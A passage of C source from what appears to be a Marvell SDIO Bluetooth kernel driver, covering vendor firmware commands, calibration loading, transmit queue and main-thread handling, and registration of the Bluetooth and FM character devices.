BT_STATUS_SUCCESS; BT_BLE_CMD *pcmd; ENTER(); skb = bt_skb_alloc(sizeof(BT_BLE_CMD), GFP_ATOMIC); if (skb == NULL) { PRINTM(WARN, "No free skb\n"); ret = BT_STATUS_FAILURE; goto exit; } pcmd = (BT_BLE_CMD *) skb->data; pcmd->ocf_ogf = (VENDOR_OGF << 10) | BT_CMD_BLE_DEEP_SLEEP; pcmd->length = 1; pcmd->deepsleep = mode; bt_cb(skb)->pkt_type = MRVL_VENDOR_PKT; skb_put(skb, sizeof(BT_BLE_CMD)); skb->dev = (void *)(&(priv->bt_dev.m_dev[BT_SEQ])); skb_queue_head(&priv->adapter->tx_queue, skb); priv->bt_dev.sendcmdflag = TRUE; priv->bt_dev.send_cmd_ocf = BT_CMD_BLE_DEEP_SLEEP; priv->adapter->cmd_complete = FALSE; PRINTM(CMD, "BT: Set BLE deepsleep = %d (0x%x)\n", mode, pcmd->ocf_ogf); wake_up_interruptible(&priv->MainThread.waitQ); if (!os_wait_interruptible_timeout (priv->adapter->cmd_wait_q, priv->adapter->cmd_complete, WAIT_UNTIL_CMD_RESP)) { ret = BT_STATUS_FAILURE; PRINTM(MSG, "BT: Set BLE deepsleep timeout:\n"); bt_cmd_timeout_func(priv->adapter, BT_CMD_BLE_DEEP_SLEEP); } exit: LEAVE(); return ret; } /** * @brief This function gets FW version * * @param priv A pointer to bt_private structure * * @return BT_STATUS_SUCCESS or BT_STATUS_FAILURE */ int bt_get_fw_version(bt_private * priv) { struct sk_buff *skb = NULL; int ret = BT_STATUS_SUCCESS; BT_HCI_CMD *pcmd; ENTER(); skb = bt_skb_alloc(sizeof(BT_HCI_CMD), GFP_ATOMIC); if (skb == NULL) { PRINTM(WARN, "No free skb\n"); ret = BT_STATUS_FAILURE; goto exit; } pcmd = (BT_HCI_CMD *) skb->data; pcmd->ocf_ogf = (VENDOR_OGF << 10) | BT_CMD_GET_FW_VERSION; pcmd->length = 0x01; pcmd->cmd_type = 0x00; bt_cb(skb)->pkt_type = MRVL_VENDOR_PKT; skb_put(skb, 4); skb->dev = (void *)(&(priv->bt_dev.m_dev[BT_SEQ])); skb_queue_head(&priv->adapter->tx_queue, skb); priv->bt_dev.sendcmdflag = TRUE; priv->bt_dev.send_cmd_ocf = BT_CMD_GET_FW_VERSION; priv->adapter->cmd_complete = FALSE; wake_up_interruptible(&priv->MainThread.waitQ); if (!os_wait_interruptible_timeout(priv->adapter->cmd_wait_q, priv->adapter->cmd_complete, WAIT_UNTIL_CMD_RESP)) { ret = BT_STATUS_FAILURE; PRINTM(MSG, "BT: Get FW version: timeout:\n"); bt_cmd_timeout_func(priv->adapter, BT_CMD_GET_FW_VERSION); } exit: LEAVE(); return ret; } /** * @brief This function sets mac address * * @param priv A pointer to bt_private structure * @param mac A pointer to mac address * * @return BT_STATUS_SUCCESS or BT_STATUS_FAILURE */ int bt_set_mac_address(bt_private * priv, u8 * mac) { struct sk_buff *skb = NULL; int ret = BT_STATUS_SUCCESS; BT_HCI_CMD *pcmd; int i = 0; ENTER(); skb = bt_skb_alloc(sizeof(BT_HCI_CMD), GFP_ATOMIC); if (skb == NULL) { PRINTM(WARN, "No free skb\n"); ret = BT_STATUS_FAILURE; goto exit; } pcmd = (BT_HCI_CMD *) skb->data; pcmd->ocf_ogf = (VENDOR_OGF << 10) | BT_CMD_CONFIG_MAC_ADDR; pcmd->length = 8; pcmd->cmd_type = MRVL_VENDOR_PKT; pcmd->cmd_len = 6; for (i = 0; i < 6; i++) pcmd->data[i] = mac[5 - i]; bt_cb(skb)->pkt_type = MRVL_VENDOR_PKT; skb_put(skb, sizeof(BT_HCI_CMD)); skb->dev = (void *)(&(priv->bt_dev.m_dev[BT_SEQ])); skb_queue_head(&priv->adapter->tx_queue, skb); priv->bt_dev.sendcmdflag = TRUE; priv->bt_dev.send_cmd_ocf = BT_CMD_CONFIG_MAC_ADDR; priv->adapter->cmd_complete = FALSE; PRINTM(CMD, "BT: Set mac addr " MACSTR " (0x%x)\n", MAC2STR(mac), pcmd->ocf_ogf); wake_up_interruptible(&priv->MainThread.waitQ); if (!os_wait_interruptible_timeout (priv->adapter->cmd_wait_q, priv->adapter->cmd_complete, WAIT_UNTIL_CMD_RESP)) { ret = BT_STATUS_FAILURE; PRINTM(MSG, "BT: Set mac addr: timeout:\n"); bt_cmd_timeout_func(priv->adapter, BT_CMD_CONFIG_MAC_ADDR); } exit: LEAVE(); return ret; } /** * @brief This function load the calibrate data * * @param priv A pointer to bt_private structure * @param config_data A pointer to calibrate data * @param mac A pointer to mac address * * @return BT_STATUS_SUCCESS or BT_STATUS_FAILURE */ int bt_load_cal_data(bt_private * priv, u8 * config_data, u8 * mac) { struct sk_buff *skb = NULL; int ret = BT_STATUS_SUCCESS; BT_CMD *pcmd; int i = 0; /* u8 config_data[28] = {0x37 0x01 0x1c 0x00 0xFF 0xFF 0xFF 0xFF 0x01 0x7f 0x04 0x02 0x00 0x00 0xBA 0xCE 0xC0 0xC6 0x2D 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xF0}; */ ENTER(); skb = bt_skb_alloc(sizeof(BT_CMD), GFP_ATOMIC); if (skb == NULL) { PRINTM(WARN, "No free skb\n"); ret = BT_STATUS_FAILURE; goto exit; } pcmd = (BT_CMD *) skb->data; pcmd->ocf_ogf = (VENDOR_OGF << 10) | BT_CMD_LOAD_CONFIG_DATA; pcmd->length = 0x20; pcmd->data[0] = 0x00; pcmd->data[1] = 0x00; pcmd->data[2] = 0x00; pcmd->data[3] = 0x1C; /* swip cal-data byte */ for (i = 4; i < 32; i++) pcmd->data[i] = config_data[(i / 4) * 8 - 1 - i]; if (mac != NULL) { pcmd->data[2] = 0x01; /* skip checksum */ for (i = 24; i < 30; i++) pcmd->data[i] = mac[29 - i]; } bt_cb(skb)->pkt_type = MRVL_VENDOR_PKT; skb_put(skb, BT_CMD_HEADER_SIZE + pcmd->length); skb->dev = (void *)(&(priv->bt_dev.m_dev[BT_SEQ])); skb_queue_head(&priv->adapter->tx_queue, skb); priv->bt_dev.sendcmdflag = TRUE; priv->bt_dev.send_cmd_ocf = BT_CMD_LOAD_CONFIG_DATA; priv->adapter->cmd_complete = FALSE; DBG_HEXDUMP(DAT_D, "calirate data: ", pcmd->data, 32); wake_up_interruptible(&priv->MainThread.waitQ); if (!os_wait_interruptible_timeout (priv->adapter->cmd_wait_q, priv->adapter->cmd_complete, WAIT_UNTIL_CMD_RESP)) { ret = BT_STATUS_FAILURE; PRINTM(ERROR, "BT: Load calibrate data: timeout:\n"); bt_cmd_timeout_func(priv->adapter, BT_CMD_LOAD_CONFIG_DATA); } exit: LEAVE(); return ret; } /** * @brief This function load the calibrate EXT data * * @param priv A pointer to bt_private structure * @param config_data A pointer to calibrate data * @param mac A pointer to mac address * * @return BT_STATUS_SUCCESS or BT_STATUS_FAILURE */ int bt_load_cal_data_ext(bt_private * priv, u8 * config_data, u32 cfg_data_len) { struct sk_buff *skb = NULL; int ret = BT_STATUS_SUCCESS; BT_CMD *pcmd; ENTER(); skb = bt_skb_alloc(sizeof(BT_CMD), GFP_ATOMIC); if (skb == NULL) { PRINTM(WARN, "No free skb\n"); ret = BT_STATUS_FAILURE; goto exit; } pcmd = (BT_CMD *) skb->data; pcmd->ocf_ogf = (VENDOR_OGF << 10) | BT_CMD_LOAD_CONFIG_DATA_EXT; pcmd->length = cfg_data_len; memcpy(pcmd->data, config_data, cfg_data_len); bt_cb(skb)->pkt_type = MRVL_VENDOR_PKT; skb_put(skb, BT_CMD_HEADER_SIZE + pcmd->length); skb->dev = (void *)(&(priv->bt_dev.m_dev[BT_SEQ])); skb_queue_head(&priv->adapter->tx_queue, skb); priv->bt_dev.sendcmdflag = TRUE; priv->bt_dev.send_cmd_ocf = BT_CMD_LOAD_CONFIG_DATA_EXT; priv->adapter->cmd_complete = FALSE; DBG_HEXDUMP(DAT_D, "calirate ext data", pcmd->data, pcmd->length); wake_up_interruptible(&priv->MainThread.waitQ); if (!os_wait_interruptible_timeout (priv->adapter->cmd_wait_q, priv->adapter->cmd_complete, WAIT_UNTIL_CMD_RESP)) { ret = BT_STATUS_FAILURE; PRINTM(ERROR, "BT: Load calibrate ext data: timeout:\n"); bt_cmd_timeout_func(priv->adapter, BT_CMD_LOAD_CONFIG_DATA_EXT); } exit: LEAVE(); return ret; } /** * @brief This function writes value to CSU registers * * @param priv A pointer to bt_private structure * @param type reg type * @param offset register address * @param value register value to write * @return BT_STATUS_SUCCESS or BT_STATUS_FAILURE */ int bt_write_reg(bt_private * priv, u8 type, u32 offset, u16 value) { struct sk_buff *skb = NULL; int ret = BT_STATUS_SUCCESS; BT_CSU_CMD *pcmd; ENTER(); skb = bt_skb_alloc(sizeof(BT_CSU_CMD), GFP_ATOMIC); if (skb == NULL) { PRINTM(WARN, "No free skb\n"); ret = BT_STATUS_FAILURE; goto exit; } pcmd = (BT_CSU_CMD *) skb->data; pcmd->ocf_ogf = (VENDOR_OGF << 10) | BT_CMD_CSU_WRITE_REG; pcmd->length = 7; pcmd->type = type; pcmd->offset[0] = (offset & 0x000000ff); pcmd->offset[1] = (offset & 0x0000ff00) >> 8; pcmd->offset[2] = (offset & 0x00ff0000) >> 16; pcmd->offset[3] = (offset & 0xff000000) >> 24; pcmd->value[0] = (value & 0x00ff); pcmd->value[1] = (value & 0xff00) >> 8; bt_cb(skb)->pkt_type = MRVL_VENDOR_PKT; skb_put(skb, sizeof(BT_CSU_CMD)); skb->dev = (void *)(&(priv->bt_dev.m_dev[BT_SEQ])); skb_queue_head(&priv->adapter->tx_queue, skb); priv->bt_dev.sendcmdflag = TRUE; priv->bt_dev.send_cmd_ocf = BT_CMD_CSU_WRITE_REG; priv->adapter->cmd_complete = FALSE; PRINTM(CMD, "BT: Set CSU reg type=%d reg=0x%x value=0x%x\n", type, offset, value); wake_up_interruptible(&priv->MainThread.waitQ); if (!os_wait_interruptible_timeout (priv->adapter->cmd_wait_q, priv->adapter->cmd_complete, WAIT_UNTIL_CMD_RESP)) { ret = BT_STATUS_FAILURE; PRINTM(ERROR, "BT: Set CSU reg timeout:\n"); bt_cmd_timeout_func(priv->adapter, BT_CMD_CSU_WRITE_REG); } exit: LEAVE(); return ret; } /** * @brief This function used to restore tx_queue * * @param priv A pointer to bt_private structure * @return N/A */ void bt_restore_tx_queue(bt_private * priv) { struct sk_buff *skb = NULL; while (!skb_queue_empty(&priv->adapter->pending_queue)) { skb = skb_dequeue(&priv->adapter->pending_queue); if (skb) skb_queue_tail(&priv->adapter->tx_queue, skb); } wake_up_interruptible(&priv->MainThread.waitQ); } /** * @brief This function used to send command to firmware * * Command format: * +--------+--------+--------+--------+--------+--------+--------+ * | OCF OGF | Length | Data | * +--------+--------+--------+--------+--------+--------+--------+ * | 2-byte | 1-byte | 4-byte | * +--------+--------+--------+--------+--------+--------+--------+ * * @param priv A pointer to bt_private structure * @return BT_STATUS_SUCCESS or BT_STATUS_FAILURE */ int bt_prepare_command(bt_private * priv) { int ret = BT_STATUS_SUCCESS; ENTER(); if (priv->bt_dev.hscfgcmd) { priv->bt_dev.hscfgcmd = 0; ret = bt_send_hscfg_cmd(priv); } if (priv->bt_dev.pscmd) { priv->bt_dev.pscmd = 0; ret = bt_enable_ps(priv); } if (priv->bt_dev.sdio_pull_ctrl) { priv->bt_dev.sdio_pull_ctrl = 0; ret = bt_send_sdio_pull_ctrl_cmd(priv); } if (priv->bt_dev.hscmd) { priv->bt_dev.hscmd = 0; if (priv->bt_dev.hsmode) ret = bt_enable_hs(priv); else { ret = sbi_wakeup_firmware(priv); priv->adapter->hs_state = HS_DEACTIVATED; } } LEAVE(); return ret; } /** @brief This function processes a single packet * * @param priv A pointer to bt_private structure * @param skb A pointer to skb which includes TX packet * @return BT_STATUS_SUCCESS or BT_STATUS_FAILURE */ static int send_single_packet(bt_private * priv, struct sk_buff *skb) { int ret; ENTER(); if (!skb || !skb->data) { LEAVE(); return BT_STATUS_FAILURE; } if (!skb->len || ((skb->len + BT_HEADER_LEN) > BT_UPLD_SIZE)) { PRINTM(ERROR, "Tx Error: Bad skb length %d : %d\n", skb->len, BT_UPLD_SIZE); LEAVE(); return BT_STATUS_FAILURE; } if (skb_headroom(skb) < BT_HEADER_LEN) { struct sk_buff *tmp = skb; skb = skb_realloc_headroom(skb, BT_HEADER_LEN); if (!skb) { PRINTM(ERROR, "TX error: realloc_headroom failed %d\n", BT_HEADER_LEN); skb = tmp; LEAVE(); return BT_STATUS_FAILURE; } kfree_skb(tmp); } /* This is SDIO specific header length: byte[3][2][1], * type: byte[0] (HCI_COMMAND = 1, ACL_DATA = 2, SCO_DATA = 3, 0xFE = Vendor) */ skb_push(skb, BT_HEADER_LEN); skb->data[0] = (skb->len & 0x0000ff); skb->data[1] = (skb->len & 0x00ff00) >> 8; skb->data[2] = (skb->len & 0xff0000) >> 16; skb->data[3] = bt_cb(skb)->pkt_type; if (bt_cb(skb)->pkt_type == MRVL_VENDOR_PKT) PRINTM(CMD, "DNLD_CMD: ocf_ogf=0x%x len=%d\n", *((u16 *) & skb->data[4]), skb->len); ret = sbi_host_to_card(priv, skb->data, skb->len); LEAVE(); return ret; } /** * @brief This function initializes the adapter structure * and set default value to the member of adapter. * * @param priv A pointer to bt_private structure * @return N/A */ static void bt_init_adapter(bt_private * priv) { ENTER(); skb_queue_head_init(&priv->adapter->tx_queue); skb_queue_head_init(&priv->adapter->pending_queue); priv->adapter->tx_lock = FALSE; priv->adapter->ps_state = PS_AWAKE; priv->adapter->suspend_fail = FALSE; priv->adapter->is_suspended = FALSE; priv->adapter->hs_skip = 0; priv->adapter->num_cmd_timeout = 0; init_waitqueue_head(&priv->adapter->cmd_wait_q); LEAVE(); } /** * @brief This function initializes firmware * * @param priv A pointer to bt_private structure * @return BT_STATUS_SUCCESS or BT_STATUS_FAILURE */ static int bt_init_fw(bt_private * priv) { int ret = BT_STATUS_SUCCESS; ENTER(); if (fw == 0) { sd_enable_host_int(priv); goto done; } sd_disable_host_int(priv); if (sbi_download_fw(priv)) { PRINTM(ERROR, " FW failed to be download!\n"); ret = BT_STATUS_FAILURE; goto done; } done: LEAVE(); return ret; } /** * @brief This function frees the structure of adapter * * @param priv A pointer to bt_private structure * @return N/A */ void bt_free_adapter(bt_private * priv) { bt_adapter *adapter = priv->adapter; ENTER(); skb_queue_purge(&priv->adapter->tx_queue); /* Free the adapter object itself */ kfree(adapter); priv->adapter = NULL; LEAVE(); } /** * @brief This function handles the wrapper_dev ioctl * * @param hev A pointer to wrapper_dev structure * @cmd ioctl cmd * @arg argument * @return -ENOIOCTLCMD */ static int mdev_ioctl(struct m_dev *m_dev, unsigned int cmd, unsigned long arg) { ENTER(); LEAVE(); return -ENOIOCTLCMD; } /** * @brief This function handles wrapper device destruct * * @param m_dev A pointer to m_dev structure * * @return N/A */ static void mdev_destruct(struct m_dev *m_dev) { ENTER(); LEAVE(); return; } /** * @brief This function handles the wrapper device transmit * * @param m_dev A pointer to m_dev structure * @param skb A pointer to sk_buff structure * * @return BT_STATUS_SUCCESS or other error no. */ static int mdev_send_frame(struct m_dev *m_dev, struct sk_buff *skb) { bt_private *priv = NULL; ENTER(); if (!m_dev || !m_dev->driver_data) { PRINTM(ERROR, "Frame for unknown HCI device (m_dev=NULL)\n"); LEAVE(); return -ENODEV; } priv = (bt_private *) m_dev->driver_data; if (!test_bit(HCI_RUNNING, &m_dev->flags)) { PRINTM(ERROR, "Fail test HCI_RUNNING, flag=0x%lx\n", m_dev->flags); LEAVE(); return -EBUSY; } switch (bt_cb(skb)->pkt_type) { case HCI_COMMAND_PKT: m_dev->stat.cmd_tx++; break; case HCI_ACLDATA_PKT: m_dev->stat.acl_tx++; break; case HCI_SCODATA_PKT: m_dev->stat.sco_tx++; break; } if (m_dev->dev_type == DEBUG_TYPE) { /* remember the ogf_ocf */ priv->debug_device_pending = 1; priv->debug_ocf_ogf[0] = skb->data[0]; priv->debug_ocf_ogf[1] = skb->data[1]; PRINTM(CMD, "debug_ocf_ogf[0]=0x%x debug_ocf_ogf[1]=0x%x\n", priv->debug_ocf_ogf[0], priv->debug_ocf_ogf[1]); } if (priv->adapter->tx_lock == TRUE) skb_queue_tail(&priv->adapter->pending_queue, skb); else skb_queue_tail(&priv->adapter->tx_queue, skb); wake_up_interruptible(&priv->MainThread.waitQ); LEAVE(); return BT_STATUS_SUCCESS; } /** * @brief This function flushes the transmit queue * * @param m_dev A pointer to m_dev structure * * @return BT_STATUS_SUCCESS */ static int mdev_flush(struct m_dev *m_dev) { bt_private *priv = (bt_private *) m_dev->driver_data; ENTER(); skb_queue_purge(&priv->adapter->tx_queue); skb_queue_purge(&priv->adapter->pending_queue); LEAVE(); return BT_STATUS_SUCCESS; } /** * @brief This function closes the wrapper device * * @param m_dev A pointer to m_dev structure * * @return BT_STATUS_SUCCESS */ static int mdev_close(struct m_dev *m_dev) { ENTER(); mdev_req_lock(m_dev); if (!test_and_clear_bit(HCI_UP, &m_dev->flags)) { mdev_req_unlock(m_dev); LEAVE(); return 0; } if (m_dev->flush) m_dev->flush(m_dev); /* wait up pending read and unregister char dev */ wake_up_interruptible(&m_dev->req_wait_q); /* Drop queues */ skb_queue_purge(&m_dev->rx_q); if (!test_and_clear_bit(HCI_RUNNING, &m_dev->flags)) { mdev_req_unlock(m_dev); LEAVE(); return 0; } module_put(THIS_MODULE); m_dev->flags = 0; mdev_req_unlock(m_dev); LEAVE(); return BT_STATUS_SUCCESS; } /** * @brief This function opens the wrapper device * * @param m_dev A pointer to m_dev structure * * @return BT_STATUS_SUCCESS or other */ static int mdev_open(struct m_dev *m_dev) { ENTER(); if (try_module_get(THIS_MODULE) == 0) return BT_STATUS_FAILURE; set_bit(HCI_RUNNING, &m_dev->flags); LEAVE(); return BT_STATUS_SUCCESS; } /** * @brief This function queries the wrapper device * * @param m_dev A pointer to m_dev structure * @param arg arguement * * @return BT_STATUS_SUCCESS or other */ void mdev_query(struct m_dev *m_dev, unsigned long arg) { struct mbt_dev *mbt_dev = (struct mbt_dev *)m_dev->dev_pointer; ENTER(); if (copy_to_user((void *)arg, &mbt_dev->type, sizeof(mbt_dev->type))) PRINTM(ERROR, "IOCTL_QUERY_TYPE: Fail copy to user\n"); LEAVE(); } /** * @brief This function initializes the wrapper device * * @param m_dev A pointer to m_dev structure * * @return BT_STATUS_SUCCESS or other */ void init_m_dev(struct m_dev *m_dev) { m_dev->dev_pointer = NULL; m_dev->driver_data = NULL; m_dev->dev_type = 0; m_dev->spec_type = 0; skb_queue_head_init(&m_dev->rx_q); init_waitqueue_head(&m_dev->req_wait_q); #if LINUX_VERSION_CODE < KERNEL_VERSION(2, 6, 37) init_MUTEX(&m_dev->req_lock); #else sema_init(&m_dev->req_lock, 1); #endif memset(&m_dev->stat, 0, sizeof(struct hci_dev_stats)); m_dev->open = mdev_open; m_dev->close = mdev_close; m_dev->flush = mdev_flush; m_dev->send = mdev_send_frame; m_dev->destruct = mdev_destruct; m_dev->ioctl = mdev_ioctl; m_dev->query = mdev_query; m_dev->owner = THIS_MODULE; m_dev->poweroff = mdev_poweroff; } /** * @brief This function handles the major job in bluetooth driver. * it handles the event generated by firmware, rx data received * from firmware and tx data sent from kernel. * * @param data A pointer to bt_thread structure * @return BT_STATUS_SUCCESS */ static int bt_service_main_thread(void *data) { bt_thread *thread = data; bt_private *priv = thread->priv; bt_adapter *adapter = priv->adapter; wait_queue_t wait; struct sk_buff *skb; ENTER(); bt_activate_thread(thread); init_waitqueue_entry(&wait, current); current->flags |= PF_NOFREEZE; for (;;) { add_wait_queue(&thread->waitQ, &wait); OS_SET_THREAD_STATE(TASK_INTERRUPTIBLE); if (priv->adapter->WakeupTries || ((!priv->adapter->IntCounter) && (!priv->bt_dev.tx_dnld_rdy || skb_queue_empty(&priv->adapter->tx_queue)))) { PRINTM(INFO, "Main: Thread sleeping...\n"); schedule(); } OS_SET_THREAD_STATE(TASK_RUNNING); remove_wait_queue(&thread->waitQ, &wait); if (kthread_should_stop() || adapter->SurpriseRemoved) { PRINTM(INFO, "main-thread: break from main thread: " "SurpriseRemoved=0x%x\n", adapter->SurpriseRemoved); break; } PRINTM(INFO, "Main: Thread waking up...\n"); if (priv->adapter->IntCounter) { OS_INT_DISABLE; adapter->IntCounter = 0; OS_INT_RESTORE; sbi_get_int_status(priv); } else if ((priv->adapter->ps_state == PS_SLEEP) && !skb_queue_empty(&priv->adapter->tx_queue)) { priv->adapter->WakeupTries++; sbi_wakeup_firmware(priv); continue; } if (priv->adapter->ps_state == PS_SLEEP) continue; if (priv->bt_dev.tx_dnld_rdy == TRUE) { if (!skb_queue_empty(&priv->adapter->tx_queue)) { skb = skb_dequeue(&priv->adapter->tx_queue); if (skb) { if (send_single_packet(priv, skb)) ((struct m_dev *)skb->dev)-> stat.err_tx++; else ((struct m_dev *)skb->dev)-> stat.byte_tx += skb->len; kfree_skb(skb); } } } } bt_deactivate_thread(thread); LEAVE(); return BT_STATUS_SUCCESS; } /** * @brief This function handles the interrupt. it will change PS * state if applicable. it will wake up main_thread to handle * the interrupt event as well. * * @param m_dev A pointer to m_dev structure * @return N/A */ void bt_interrupt(struct m_dev *m_dev) { bt_private *priv = (bt_private *) m_dev->driver_data; ENTER(); if (!priv || !priv->adapter) { LEAVE(); return; } PRINTM(INTR, "*\n"); priv->adapter->ps_state = PS_AWAKE; if (priv->adapter->hs_state == HS_ACTIVATED) { PRINTM(CMD, "BT: %s: HS DEACTIVATED in ISR!\n", m_dev->name); priv->adapter->hs_state = HS_DEACTIVATED; } priv->adapter->WakeupTries = 0; priv->adapter->IntCounter++; wake_up_interruptible(&priv->MainThread.waitQ); LEAVE(); } static void char_dev_release_dynamic(struct kobject *kobj) { struct char_dev *cdev = container_of(kobj, struct char_dev, kobj); ENTER(); PRINTM(INFO, "free char_dev\n"); kfree(cdev); LEAVE(); } static struct kobj_type ktype_char_dev_dynamic = { .release = char_dev_release_dynamic, }; static struct char_dev * alloc_char_dev(void) { struct char_dev *cdev; ENTER(); cdev = kzalloc(sizeof(struct char_dev), GFP_KERNEL); if (cdev) { kobject_init(&cdev->kobj, &ktype_char_dev_dynamic); PRINTM(INFO, "alloc char_dev\n"); } return cdev; } static void bt_private_dynamic_release(struct kobject *kobj) { bt_private *priv = container_of(kobj, bt_private, kobj); ENTER(); PRINTM(INFO, "free bt priv\n"); kfree(priv); LEAVE(); } static struct kobj_type ktype_bt_private_dynamic = { .release = bt_private_dynamic_release, }; static bt_private * bt_alloc_priv(void) { bt_private *priv; ENTER(); priv = kzalloc(sizeof(bt_private), GFP_KERNEL); if (priv) { kobject_init(&priv->kobj, &ktype_bt_private_dynamic); PRINTM(INFO, "alloc bt priv\n"); } LEAVE(); return priv; } struct kobject * bt_priv_get(bt_private * priv) { PRINTM(INFO, "bt priv get object"); return kobject_get(&priv->kobj); } void bt_priv_put(bt_private * priv) { PRINTM(INFO, "bt priv put object"); kobject_put(&priv->kobj); } /** * @brief Module configuration and register device * * @param priv A Pointer to bt_private structure * @return BT_STATUS_SUCCESS or BT_STATUS_FAILURE */ int sbi_register_conf_dpc(bt_private * priv) { int ret = BT_STATUS_SUCCESS; struct mbt_dev *mbt_dev = NULL; struct fm_dev *fm_dev = NULL; struct nfc_dev *nfc_dev = NULL; struct debug_dev *debug_dev = NULL; struct m_dev *m_dev = NULL; int i = 0; struct char_dev *char_dev = NULL; char dev_file[DEV_NAME_LEN + 5]; unsigned char dev_type = 0; ENTER(); priv->bt_dev.tx_dnld_rdy = TRUE; if (drv_mode & DRV_MODE_BT) { mbt_dev = alloc_mbt_dev(); if (!mbt_dev) { PRINTM(FATAL, "Can not allocate mbt dev\n"); ret = -ENOMEM; goto err_kmalloc; } init_m_dev(&(priv->bt_dev.m_dev[BT_SEQ])); priv->bt_dev.m_dev[BT_SEQ].dev_type = BT_TYPE; priv->bt_dev.m_dev[BT_SEQ].spec_type = IANYWHERE_SPEC; priv->bt_dev.m_dev[BT_SEQ].dev_pointer = (void *)mbt_dev; priv->bt_dev.m_dev[BT_SEQ].driver_data = priv; priv->bt_dev.m_dev[BT_SEQ].read_continue_flag = 0; } dev_type = HCI_SDIO; if (mbt_dev) mbt_dev->type = dev_type; ret = bt_send_module_cfg_cmd(priv, MODULE_BRINGUP_REQ); if (ret < 0) { PRINTM(FATAL, "Module cfg command send failed!\n"); goto done; } ret = bt_set_ble_deepsleep(priv, TRUE); if (ret < 0) { PRINTM(FATAL, "Enable BLE deepsleep failed!\n"); goto done; } if (psmode) { priv->bt_dev.psmode = TRUE; priv->bt_dev.idle_timeout = DEFAULT_IDLE_TIME; ret = bt_enable_ps(priv); if (ret < 0) { PRINTM(FATAL, "Enable PS mode failed!\n"); goto done; } } #ifdef SDIO_SUSPEND_RESUME priv->bt_dev.gpio_gap = 0x0864; ret = bt_send_hscfg_cmd(priv); if (ret < 0) { PRINTM(FATAL, "Send HSCFG failed!\n"); goto done; } #endif priv->bt_dev.sdio_pull_cfg = 0xffffffff; priv->bt_dev.sdio_pull_ctrl = 0; wake_up_interruptible(&priv->MainThread.waitQ); if (priv->bt_dev.devType == DEV_TYPE_AMP) { mbt_dev->type |= HCI_BT_AMP; priv->bt_dev.m_dev[BT_SEQ].dev_type = BT_AMP_TYPE; } /* block all the packet from bluez */ if (init_cfg || cal_cfg || bt_mac || cal_cfg_ext) priv->adapter->tx_lock = TRUE; if (mbt_dev) { /** init mbt_dev */ mbt_dev->flags = 0; mbt_dev->pkt_type = (HCI_DM1 | HCI_DH1 | HCI_HV1); mbt_dev->esco_type = (ESCO_HV1); mbt_dev->link_mode = (HCI_LM_ACCEPT); mbt_dev->idle_timeout = 0; mbt_dev->sniff_max_interval = 800; mbt_dev->sniff_min_interval = 80; for (i = 0; i < 3; i++) mbt_dev->reassembly[i] = NULL; atomic_set(&mbt_dev->promisc, 0); /** alloc char dev node */ char_dev = alloc_char_dev(); if (!char_dev) { class_destroy(chardev_class); ret = -ENOMEM; goto err_kmalloc; } char_dev->minor = MBTCHAR_MINOR_BASE + mbtchar_minor; if (mbt_dev->type & HCI_BT_AMP) char_dev->dev_type = BT_AMP_TYPE; else char_dev->dev_type = BT_TYPE; if (bt_name) snprintf(mbt_dev->name, sizeof(mbt_dev->name), "%s%d", bt_name, mbtchar_minor); else snprintf(mbt_dev->name, sizeof(mbt_dev->name), "mbtchar%d", mbtchar_minor); snprintf(dev_file, sizeof(dev_file), "/dev/%s", mbt_dev->name); mbtchar_minor++; PRINTM(MSG, "BT: Create %s\n", dev_file); /** register m_dev to BT char device */ priv->bt_dev.m_dev[BT_SEQ].index = char_dev->minor; char_dev->m_dev = &(priv->bt_dev.m_dev[BT_SEQ]); /** create BT char device node */ register_char_dev(char_dev, chardev_class, MODULE_NAME, mbt_dev->name); /** chmod & chown for BT char device */ mbtchar_chown(dev_file, AID_SYSTEM, AID_BLUETOOTH); mbtchar_chmod(dev_file, 0660); /** create proc device */ snprintf(priv->bt_dev.m_dev[BT_SEQ].name, sizeof(priv->bt_dev.m_dev[BT_SEQ].name), mbt_dev->name); bt_proc_init(priv, &(priv->bt_dev.m_dev[BT_SEQ]), BT_SEQ); } if ((drv_mode & DRV_MODE_FM) && (!(priv->bt_dev.devType == DEV_TYPE_AMP)) && (priv->bt_dev.devFeature & DEV_FEATURE_FM)) { /** alloc fm_dev */ fm_dev = alloc_fm_dev(); if (!fm_dev) { PRINTM(FATAL, "Can not allocate fm dev\n"); ret = -ENOMEM; goto err_kmalloc; } /** init m_dev */ init_m_dev(&(priv->bt_dev.m_dev[FM_SEQ])); priv->bt_dev.m_dev[FM_SEQ].dev_type = FM_TYPE; priv->bt_dev.m_dev[FM_SEQ].spec_type = GENERIC_SPEC; priv->bt_dev.m_dev[FM_SEQ].dev_pointer = (void *)fm_dev; priv->bt_dev.m_dev[FM_SEQ].driver_data = priv; priv->bt_dev.m_dev[FM_SEQ].read_continue_flag = 0; /** create char device for FM */ char_dev = alloc_char_dev(); if (!char_dev) { class_destroy(chardev_class); ret = -ENOMEM; goto err_kmalloc; } char_dev->minor = FMCHAR_MINOR_BASE + fmchar_minor; char_dev->dev_type = FM_TYPE; if (fm_name) snprintf(fm_dev->name, sizeof(fm_dev->name), "%s%d", fm_name, fmchar_minor); else snprintf(fm_dev->name, sizeof(fm_dev->name), "mfmchar%d", fmchar_minor); snprintf(dev_file, sizeof(dev_file), "/dev/%s", fm_dev->name); PRINTM(MSG, "BT: Create %s\n", dev_file); fmchar_minor++; /** register m_dev to FM char device */ priv->bt_dev.m_dev[FM_SEQ].index = char_dev->minor; char_dev->m_dev = &(priv->bt_dev.m_dev[FM_SEQ]); /** register char dev */ register_char_dev(char_dev, chardev_class, MODULE_NAME, fm_dev->name); /** chmod for FM char device */ mbtchar_chmod(dev_file, 0660); /** create proc device */ snprintf(priv->bt_dev.m_dev[FM_SEQ].name, sizeof(priv->bt_dev.m_dev[FM_SEQ].name), fm_dev->name); bt_proc_init(priv, &(priv->bt_dev.m_dev[FM_SEQ]), FM_SEQ); } if ((drv_mode & DRV_MODE_NFC) && (!(priv->bt_dev.devType == DEV_TYPE_AMP)) && (priv->bt_dev.devFeature & DEV_FEATURE_NFC)) { /** alloc nfc_dev */ nfc_dev = alloc_nfc_dev(); if (!nfc_dev) { PRINTM(FATAL, "Can not allocate nfc dev\n"); ret = -ENOMEM; goto err_kmalloc; } /** init m_dev */ init_m_dev(&(priv->bt_dev.m_dev[NFC_SEQ])); priv->bt_dev.m_dev[NFC_SEQ].dev_type = NFC_TYPE; priv->bt_dev.m_dev[NFC_SEQ].spec_type = GENERIC_SPEC; priv->bt_dev.m_dev[NFC_SEQ].dev_pointer = (void *)nfc_dev; 